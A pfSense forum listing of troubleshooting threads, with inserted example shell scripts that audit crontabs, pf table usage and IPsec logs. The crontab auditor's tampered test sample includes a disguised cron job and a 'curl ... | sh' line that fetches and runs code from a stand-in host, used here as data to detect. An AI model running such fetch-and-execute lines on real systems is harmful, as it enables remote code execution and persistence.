• Active Directory Authentication

    8
    0 Votes
    8 Posts
    1k Views
    A
    stephenw10 - I was just saying the same thing about SSL and STARTTLS then realized you had already clarified that! In that example I gave above about the "test1" and "test2" groups they were sitting side by side in the root domain, which is why I don't at all understand why one works and one doesn't when my authentication container is the root domain itself. If it sees one OU it should see both, right? Unless there's a way to make pfSense do a more detailed query when someone tries to log in I've about decided that this won't work. One thing I have not tried yet, because it seems kind of messy to deal with later on down the road, is listing each individual OU in the authentication container field. This would be easy to do since it lets you select OUs with checkboxes, but if for some reason I ran into a scenario where pfSense couldn't talk to AD and I couldn't pull up that list of checkboxes it would be hell to sift through all that data in that tiny field if an OU got deleted or something screwing the whole thing up. Hopefully that makes sense.... Thanks for the responses everyone!
  • 0 Votes
    3 Posts
    389 Views
    superweaselS
    Per Netgate Support, downgrading to 2.4.3_p1 until fixed.
  • Problem with Static ARP entry for VLAN/Virtual Interface

    4
    0 Votes
    4 Posts
    627 Views
    J
    @marvosa said in Problem with Static ARP entry for VLAN/Virtual Interface: @joelones said in Problem with Static ARP entry for VLAN/Virtual Interface: the switch port of my Mac OSX is trunked to VLAN10 Please clarify... cause none of this sounds right What I meant to say was that the port of the Netgear switch on which my Mac OS X box is connected allows untagged as well as VLAN 10 traffic to pass. But I suspect the Mac OS X update did something to affect this behaviour, as it was working fine before the update and pfSense saw the VM's MAC address; now it does not.
  • CRON Reset to default?

    7
    0 Votes
    7 Posts
    1k Views
    fireodoF
    # /etc/crontab - root's crontab for FreeBSD
    #
    # $FreeBSD$
    #
    SHELL=/bin/sh
    PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
    #
    #minute hour    mday    month   wday    who     command
    #
    #*/5    *       *       *       *       root    /usr/libexec/atrun
    #
    # Save some entropy so that /dev/random can re-seed on boot.
    #*/11   *       *       *       *       operator /usr/libexec/save-entropy
    #
    # Rotate log files every hour, if necessary.
    #0      *       *       *       *       root    newsyslog
    #
    # Perform daily/weekly/monthly maintenance.
    #1      3       *       *       *       root    periodic daily
    #15     4       *       *       6       root    periodic weekly
    #30     5       1       *       *       root    periodic monthly
    #
    # Adjust the time zone if the CMOS clock keeps local time, as opposed to
    # UTC time.  See adjkerntz(8) for details.
    #1,31   0-5     *       *       *       root    adjkerntz -a
    #
    # pfSense specific crontab entries
    # Created: July 24, 2018, 8:39 pm
    #
    1,31    0-5     *       *       *       root    /usr/bin/nice -n20 adjkerntz -a
    1       3       1       *       *       root    /usr/bin/nice -n20 /etc/rc.update_bogons.sh
    */60    *       *       *       *       root    /usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 sshlockout
    */60    *       *       *       *       root    /usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 webConfiguratorlockout
    1       1       *       *       *       root    /usr/bin/nice -n20 /etc/rc.dyndns.update
    */60    *       *       *       *       root    /usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 virusprot
    30      12      *       *       *       root    /usr/bin/nice -n20 /etc/rc.update_urltables
    1       0       *       *       *       root    /usr/bin/nice -n20 /etc/rc.update_pkg_metadata
    */5     *       *       *       *       root    /usr/local/bin/vnstat -u
    1       0       *       *       *       root    /bin/pkill -HUP -F /var/run/bandwidthd.pid
    #
    # If possible do not add items to this file manually.
    # If done so, this file must be terminated with a blank line (e.g. new line)
    #

    Hope it helps you!
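A small audit script for a pfSense-style /etc/crontab, added here as an example; it is not pfSense code and not part of the post above. It checks what the generated file's footer warns about, that the file ends with a newline (cron does not run an unterminated last line), that every job line carries the five time fields plus user and command, and that each job's program is one of the pfSense-generated commands visible in the crontab above, so a job someone added for persistence stands out. The allowlist and the clean sample are taken from the posted crontab; the two extra jobs in the tampered sample are made up for this example.

```shell
#!/bin/sh
# Audit a pfSense-style /etc/crontab. Added example, not pfSense code.
# Allowlist of program basenames from the pfSense-generated crontab posted
# above (constructed for this example; extend it for installed packages).
KNOWN_CMDS='adjkerntz rc.update_bogons.sh expiretable rc.dyndns.update rc.update_urltables rc.update_pkg_metadata vnstat pkill'

# ends_with_newline FILE: true when the last byte of FILE is "\n".
# cron(8) ignores an unterminated last line, which is why the generated
# file warns that manual additions must end with a newline.
ends_with_newline() {
    [ -s "$1" ] && [ "$(tail -c 1 "$1" | wc -l | tr -d ' ')" -eq 1 ]
}

# audit_crontab FILE: print one finding per line; exit status = number of findings.
audit_crontab() {
    findings=$(
        ends_with_newline "$1" || echo "NO-TRAILING-NEWLINE: $1"
        awk -v known="$KNOWN_CMDS" '
            BEGIN { n = split(known, k, " "); for (i = 1; i <= n; i++) ok[k[i]] = 1 }
            /^[[:space:]]*(#|$)/ { next }                # comments and blank lines
            /^[A-Za-z_][A-Za-z0-9_]*=/ { next }          # SHELL=, PATH=, ...
            NF < 7 { print "MALFORMED line " NR ": " $0; next }
            {
                cmd = $7; for (i = 8; i <= NF; i++) cmd = cmd " " $i
                sub(/^\/usr\/bin\/nice -n[0-9]+ /, "", cmd)   # pfSense wraps its jobs in nice
                split(cmd, w, " "); prog = w[1]; sub(/.*\//, "", prog)
                if (!(prog in ok)) print "UNKNOWN line " NR " (" $6 "): " cmd
            }' "$1"
    )
    [ -n "$findings" ] && printf '%s\n' "$findings"
    return "$(printf '%s' "$findings" | grep -c .)"
}

# sample_crontab: a subset of the pfSense-generated entries from the post (constructed).
sample_crontab() {
    cat <<'EOF'
# /etc/crontab - root's crontab for FreeBSD
SHELL=/bin/sh
PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
#minute hour mday month wday who command
# pfSense specific crontab entries
1,31 0-5 * * * root /usr/bin/nice -n20 adjkerntz -a
1 3 1 * * root /usr/bin/nice -n20 /etc/rc.update_bogons.sh
*/60 * * * * root /usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 sshlockout
1 1 * * * root /usr/bin/nice -n20 /etc/rc.dyndns.update
*/5 * * * * root /usr/local/bin/vnstat -u
1 0 * * * root /bin/pkill -HUP -F /var/run/bandwidthd.pid
EOF
}

# tampered_crontab: the same file plus two hand-added jobs (made up for this
# example); the last one lacks the trailing newline that cron requires.
tampered_crontab() {
    sample_crontab
    printf '*/10 * * * * root /usr/local/etc/rc.d/.cache/beacon.sh\n'
    printf '*/15 * * * * root /usr/local/bin/curl -s http://192.0.2.10/x | sh'
}

# Stand-alone demo: audit a clean and a tampered copy.
clean=$(mktemp); tampered=$(mktemp)
sample_crontab > "$clean"; tampered_crontab > "$tampered"
for f in "$clean" "$tampered"; do
    rc=0; audit_crontab "$f" || rc=$?
    echo "$f: $rc finding(s)"
done
rm -f "$clean" "$tampered"
```

On a real box run `audit_crontab /etc/crontab` after extending KNOWN_CMDS with whatever installed packages legitimately schedule; anything reported as UNKNOWN deserves a look, and a NO-TRAILING-NEWLINE finding means the last job is silently not running.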
  • Crash autoconfig help

    4
    0 Votes
    4 Posts
    529 Views
    stephenw10S
    Ah, so that's an older version of the development package for ACB2. That is now merged into the base in 2.4.4 so I don't think it's available as a package. At least 2.11 was though so it's likely that bug is fixed. At this point I would either remove it and go back to the v1 ACB package or go to 2.4.4 snapshot if you're able to. The usual warnings apply though, don't run it in production etc... Steve
  • pfsense work and after few days , it doesn't work

    7
    0 Votes
    7 Posts
    713 Views
    GertjanG
    Still waiting for: ipconfig /all. Consider: @bisssane said in pfsense work and after few days , it doesn't work: for the DNS, it is not activated on Pfsense, I use the DNS server of the company This can work, but is probably not set up correctly. So, is this "DNS company server" on the same LAN as other devices? Do devices on LAN(s) obtain the correct IP address from pfSense as "the DNS server"? (the ipconfig /all test) If the DNS server is on a separate LAN, do firewall rules permit traffic to reach the DNS server? Etc etc etc. Detail your setup, and you'll have an answer right away. (Btw: know that pfSense can handle DNS just fine and all that with zero config needed ^^)
  • Firewall Maximum Table Entries

    2
    0 Votes
    2 Posts
    261 Views
    jimpJ
    It is the total number of entries allowed in firewall tables. This includes aliases as well as lists of hosts from features like URL table aliases, bogons, packages that make lists like pfBlocker, and anything else hooked into the aliases/tables function of pf.
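Because the limit counts every entry across every pf table (aliases, URL table aliases, bogons, pfBlocker lists), the useful check is the sum of all tables against the configured ceiling rather than any one alias. The script below is an added example, not pfSense code: the parsing functions take `pfctl -sm` and `pfctl -t NAME -T show` output on stdin so they can be exercised offline with constructed text, and `live_report` strings them together against the real pf. The OK/WARN/CRIT thresholds are this example's choice; pf itself rejects additions beyond the limit, which in pfSense shows up as table and filter reload errors.

```shell
#!/bin/sh
# Compare total pf table entries with the table-entries hard limit.
# Added example, not pfSense code. Parsers read pfctl output from stdin.

# table_limit: extract the hard limit from `pfctl -sm` output
# (a line like "table-entries  hard limit  400000"); prints 0 if absent.
table_limit() {
    awk '/^table-entries/ { lim = $NF } END { print lim + 0 }'
}

# count_entries: count addresses in `pfctl -t NAME -T show` output,
# which prints one (indented) address or prefix per line.
count_entries() {
    awk 'NF { n++ } END { print n + 0 }'
}

# usage_pct LIMIT TOTAL: integer percentage of the limit in use.
usage_pct() {
    [ "$1" -gt 0 ] || { echo 0; return; }
    echo $(( $2 * 100 / $1 ))
}

# usage_status LIMIT TOTAL: OK below 75%, WARN from 75%, CRIT from 90%
# (thresholds chosen for this example).
usage_status() {
    pct=$(usage_pct "$1" "$2")
    if [ "$pct" -ge 90 ]; then echo CRIT
    elif [ "$pct" -ge 75 ]; then echo WARN
    else echo OK; fi
}

# live_report: run on a pfSense box as root (not exercised offline).
live_report() {
    limit=$(pfctl -sm | table_limit)
    total=0
    for t in $(pfctl -sT); do
        n=$(pfctl -t "$t" -T show | count_entries)
        printf '%-32s %8d\n' "$t" "$n"
        total=$((total + n))
    done
    printf 'total %d of %d (%d%%): %s\n' "$total" "$limit" \
        "$(usage_pct "$limit" "$total")" "$(usage_status "$limit" "$total")"
}

# Offline demo with constructed pfctl output (not a real capture).
demo() {
    limit=$(printf 'states hard limit 98000\ntable-entries hard limit 400000\n' | table_limit)
    bogons=$(printf '   0.0.0.0/8\n   10.0.0.0/8\n   127.0.0.0/8\n' | count_entries)
    pfb=$(printf '   198.51.100.0/24\n   203.0.113.0/24\n' | count_entries)
    total=$((bogons + pfb))
    echo "limit=$limit total=$total $(usage_pct "$limit" "$total")% $(usage_status "$limit" "$total")"
}
demo
```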
  • SSH encountered an unknown error during the connection

    2
    0 Votes
    2 Posts
    667 Views
    stephenw10S
    You probably need to use the root user there. Steve
  • Certificates missing for new users after upgrading to 2.4.3-RELEASE-p1

    13
    0 Votes
    13 Posts
    1k Views
    R
    Yes, related to the(reverse NAT?) issue with upgrading the standby; the first attempt at upgrading did not complete before timing out. I believe I got a "upgrade already in progress" when I ran a subsequent upgrade from shell and then wound up rebooting...
  • 0 Votes
    2 Posts
    756 Views
    stephenw10S
    You can setup pfSense bridged so it doesn't route anything. https://www.netgate.com/docs/pfsense/interfaces/interface-bridges.html If you don't use pfSense to route the traffic, and the USG is NATing, then you won't have any internal visibility from Snort. No way to see which internal IP is sending bad traffic if you get malware for example. Steve
  • simple list showing which websites were visited by which internal ip's

    2
    0 Votes
    2 Posts
    533 Views
    stephenw10S
    You can use Squid with Lightsquid to get a list of sites like that per internal IP. Steve
  • 0 Votes
    2 Posts
    2k Views
    jimpJ
    Have you tried the commands in the "Update Troubleshooting" section of the release blog post(s)? https://www.netgate.com/blog/pfsense-2-4-3-release-p1-and-2-3-5-release-p2-now-available.html
  • I got a dpinger error

    3
    0 Votes
    3 Posts
    773 Views
    G
    Okay thank you
  • One Update Time Per Day

    11
    0 Votes
    11 Posts
    1k Views
    NollipfSenseN
    @johnpoz said in One Update Time Per Day: Cron package allows you to be very specific about when jobs run.. Okay, thank you, Johnpoz, I'll try that package.
  • Dynamic DNS or IP Address Goes to Login Page

    4
    0 Votes
    4 Posts
    852 Views
    N
    Thank you for the replies. I was actually checking from my LAN. When I tried from outside, Firefox timed out; it wasn't able to connect.
  • Captive portal radius server

    5
    0 Votes
    5 Posts
    898 Views
    GertjanG
    Well, you might be closer to a solution than you think. These Draytek routers have RADIUS support, so set up a centralized database - the one that, among other things, captures the MAC - and you have what you want. Whether the Draytek will consult this database before login (on another portal device), that I don't know.
  • Disk Usage/ 100%

    5
    0 Votes
    5 Posts
    922 Views
    S
    @harvy66 said in Disk Usage/ 100%: I didn't know you could install pfSense on less than 1GiB of storage. Missed that...per https://www.pfsense.org/products/ the requirement is a 1 GB drive, and "Note the minimum requirements are not suitable for all environments." I just looked at an SG-3100 that is not running any packages and it is using 13% of 7 GiB, or per quick math, is using 910 MiB. So yeah 908 MiB is probably too small considering there should be space for updates and logs.
  • New User... Slow Upload Speed

    19
    0 Votes
    19 Posts
    3k Views
    H
    @jknott said in New User... Slow Upload Speed: @harvy66 said in New User... Slow Upload Speed: My cats don't chew on braided cables Are they named CAT 5, CAT 6 etc.? :-) Coincidentally, we're one shy of our 7th cat... Even the braided cables will no longer be safe. Colored split-loom it is. They don't chew on split-loom, but I hate how it looks.
  • Beep notification on connection down ?

    4
    0 Votes
    4 Posts
    729 Views
    fireodoF
    You can define the length of the beep, you can try to find a length that fits your needs!
  • Is it bug? IPSEC child SA entries too much, olds not deleted

    22
    0 Votes
    22 Posts
    6k Views
    DerelictD
    The best thing to do is log to a remote log server.

    If adjusting the number of log entries visible using the filter in that view is insufficient, you can use this command to save all IPsec logs:

        clog /var/log/ipsec.log > /tmp/ipsec.log.txt

    Execute that in Diagnostics > System Command. Then, on that same page, Download File /tmp/ipsec.log.txt.

    The logs kept on the firewall are circular, however, meaning old entries are overwritten by newer entries. The amount of logging kept is set in Status > System Logs > Settings, Log file size (Bytes). What you can do there depends on your disk size. I have mine set to 50000000 (50MB) on a system with a 30GB mSATA and it is still 90% free (about 3GB used; "Disk space currently used by log files is: 1.2G. Remaining disk space for log files: 22G"). You have to reset all logs further down on that page for this to take effect.

    You can save a lot of the system state in a status output file. That is taken by navigating to https://firewall.address/status.php and downloading the resulting file. On busy firewalls that might take a moment to run. And for IPsec issues the logs saved there are often insufficient, so the status output should be coupled with an ipsec.log.txt file as described above.

    If you have more than one tunnel it is often beneficial to get the conXXXX number of the tunnel from ipsec statusall so you can filter on it (and filter out other tunnel logs) using grep, etc.
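The grep filtering described in the post, worked through as an added example (not pfSense code and not from the post): `conn_lines` keeps one connection's lines, matching the conXXXX name as a whole token so that filtering on con1000 does not also pull in con10000, and `child_sa_balance` tallies CHILD_SA establish and close events for that connection, which is the quickest way to see whether rekeys are accumulating child SAs without the old ones being removed. It works on the text produced by `clog /var/log/ipsec.log`. The sample lines below are constructed in the shape charon writes them, not a real capture, and the connection names and SPIs are made up.

```shell
#!/bin/sh
# Filter one IPsec tunnel's log lines and count its CHILD_SA churn.
# Added example, not pfSense code. Reads charon log text from stdin.

# conn_lines CONN: keep only lines for connection CONN (e.g. con1000),
# matched as a whole token so con1000 does not also match con10000.
conn_lines() {
    grep -E "(^|[^[:alnum:]_])$1([^[:alnum:]_]|$)"
}

# child_sa_balance CONN: print "CONN established=N closed=M open=N-M".
# A steadily growing "open" figure across rekeys is the symptom in this thread.
child_sa_balance() {
    conn_lines "$1" | awk -v c="$1" '
        /CHILD_SA .* established with SPIs/ { est++ }
        /closing CHILD_SA/                  { cls++ }
        END { printf "%s established=%d closed=%d open=%d\n", c, est, cls, est - cls }'
}

# Constructed sample in charon's log format (not a real capture).
SAMPLE_LOG='Jul 24 20:39:01 fw charon: 11[IKE] <con1000|3> establishing CHILD_SA con1000{5}
Jul 24 20:39:01 fw charon: 11[IKE] <con1000|3> CHILD_SA con1000{5} established with SPIs c0a8a1b2_i d4e5f6a7_o and TS 10.0.0.0/24 === 10.1.0.0/24
Jul 24 20:39:02 fw charon: 12[IKE] <con2000|4> CHILD_SA con2000{6} established with SPIs 11112222_i 33334444_o and TS 10.0.0.0/24 === 10.2.0.0/24
Jul 24 21:39:01 fw charon: 13[IKE] <con1000|3> establishing CHILD_SA con1000{7} reqid 1
Jul 24 21:39:01 fw charon: 13[IKE] <con1000|3> CHILD_SA con1000{7} established with SPIs 55556666_i 77778888_o and TS 10.0.0.0/24 === 10.1.0.0/24
Jul 24 21:39:31 fw charon: 13[IKE] <con1000|3> closing CHILD_SA con1000{5} with SPIs c0a8a1b2_i d4e5f6a7_o and TS 10.0.0.0/24 === 10.1.0.0/24
Jul 24 22:39:01 fw charon: 14[IKE] <con1000|3> CHILD_SA con1000{8} established with SPIs 9999aaaa_i bbbbcccc_o and TS 10.0.0.0/24 === 10.1.0.0/24
Jul 24 22:39:02 fw charon: 14[IKE] <con10000|9> CHILD_SA con10000{2} established with SPIs ddddeeee_i ffff0000_o and TS 10.0.0.0/24 === 10.3.0.0/24'

# Stand-alone demo on the sample; on a firewall replace the printf with
#   clog /var/log/ipsec.log | child_sa_balance con1000
for conn in con1000 con2000 con10000; do
    printf '%s\n' "$SAMPLE_LOG" | child_sa_balance "$conn"
done
```

For con1000 the sample shows three CHILD_SAs established and only one closed, which is exactly the pattern to look for when the status page lists more child SA entries than the tunnel should have.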
Copyright 2025 Rubicon Communications LLC (Netgate). All rights reserved.